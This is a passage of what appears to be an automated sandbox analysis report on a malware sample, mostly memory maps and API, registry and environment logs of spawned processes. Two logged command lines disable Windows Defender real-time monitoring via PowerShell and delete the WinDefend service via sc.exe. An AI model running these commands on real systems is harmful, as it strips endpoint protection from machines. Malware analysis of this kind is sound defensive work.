private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a680000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75fe3b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Fn
Get Time type = Ticks, time = 269086 True 1
Fn
Environment (18)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000001 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #18: powershell.exe
205 0
»
Information Value
ID #18
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
»
Information Value
PID 0x914
Parent PID 0x648 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 3C4
0x 748
0x 9C0
0x 9DC
0x 9AC
0x 9C4
0x 4B4
0x 37C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00130000 0x00132fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x001f0000 0x001f3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00200000 0x0021efff Memory Mapped File Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00230000 0x0025ffff Memory Mapped File Readable True False False -
cversions.2.db 0x00260000 0x00263fff Memory Mapped File Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory - True False False -
private_0x0000000000300000 0x00300000 0x0030ffff Private Memory - True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x0000000000350000 0x00350000 0x003cffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x003d0000 0x00435fff Memory Mapped File Readable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory - True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory - True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory - True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable, Executable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
l_intl.nls 0x004d0000 0x004d2fff Memory Mapped File Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004e0fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x004f0000 0x004f4fff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
microsoft.wsman.runtime.dll 0x00540000 0x00547fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d70000 0x01d70000 0x01e4efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e80000 0x01e80000 0x01ebffff Private Memory Readable, Writable True False False -
private_0x0000000001ed0000 0x01ed0000 0x01f0ffff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002070000 0x02070000 0x020affff Private Memory Readable, Writable True False False -
sortkey.nlp 0x020b0000 0x020f0fff Memory Mapped File Readable False False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
private_0x0000000002150000 0x02150000 0x0218ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02190000 0x0245efff Memory Mapped File Readable False False False -
pagefile_0x0000000002460000 0x02460000 0x02852fff Pagefile Backed Memory Readable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x028d0000 0x0290ffff Memory Mapped File Readable False False False -
private_0x0000000002910000 0x02910000 0x0294ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002950000 0x02950000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002a70000 0x02a70000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002a80000 0x02a80000 0x04a7ffff Private Memory Readable, Writable True False False -
private_0x0000000004aa0000 0x04aa0000 0x04adffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04ae0000 0x04dc1fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll.mui 0x04dd0000 0x04e8ffff Memory Mapped File Readable, Writable False False False -
powershell.exe 0x21d50000 0x21dc1fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
system.management.automation.ni.dll 0x71f20000 0x72799fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x727a0000 0x72a81fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x72a90000 0x7322bfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x73230000 0x73d27fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x73d30000 0x742dafff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
system.core.ni.dll 0x74400000 0x74634fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
system.transactions.ni.dll 0x74680000 0x7471bfff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x747a0000 0x747eafff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.consolehost.ni.dll 0x749a0000 0x74a20fff Memory Mapped File Readable, Writable, Executable True False False -
msvcr80.dll 0x74a80000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74b20000 0x74b99fff Memory Mapped File Readable, Writable, Executable True False False -
ntshrui.dll 0x74ba0000 0x74c0ffff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.management.ni.dll 0x75020000 0x750a4fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75360000 0x75369fff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75370000 0x75388fff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x75390000 0x75398fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x753a0000 0x753ebfff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x75430000 0x7545dfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x75460000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False -
mscoree.dll 0x75560000 0x755a9fff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.runtime.dll 0x755e0000 0x755e7fff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x755f0000 0x75614fff Memory Mapped File Readable, Writable, Executable True False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 50 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (114)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 6
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Users\kFT6uTQW type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Write CONOUT$ size = 79 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 79 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 62 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 17 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 57 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 79 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 25 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 54 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 1 True 2
Fn
Data
Registry (14)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment (55)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 49
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Process #19: sc.exe
8 0
»
Information Value
ID #19
File Name c:\windows\syswow64\sc.exe
Command Line sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
»
Information Value
PID 0x9a4
Parent PID 0x77c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9D4
0x 75C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x00080000 0x0008ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00200000 0x002bffff Memory Mapped File Readable, Writable False False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000620000 0x00620000 0x0071ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
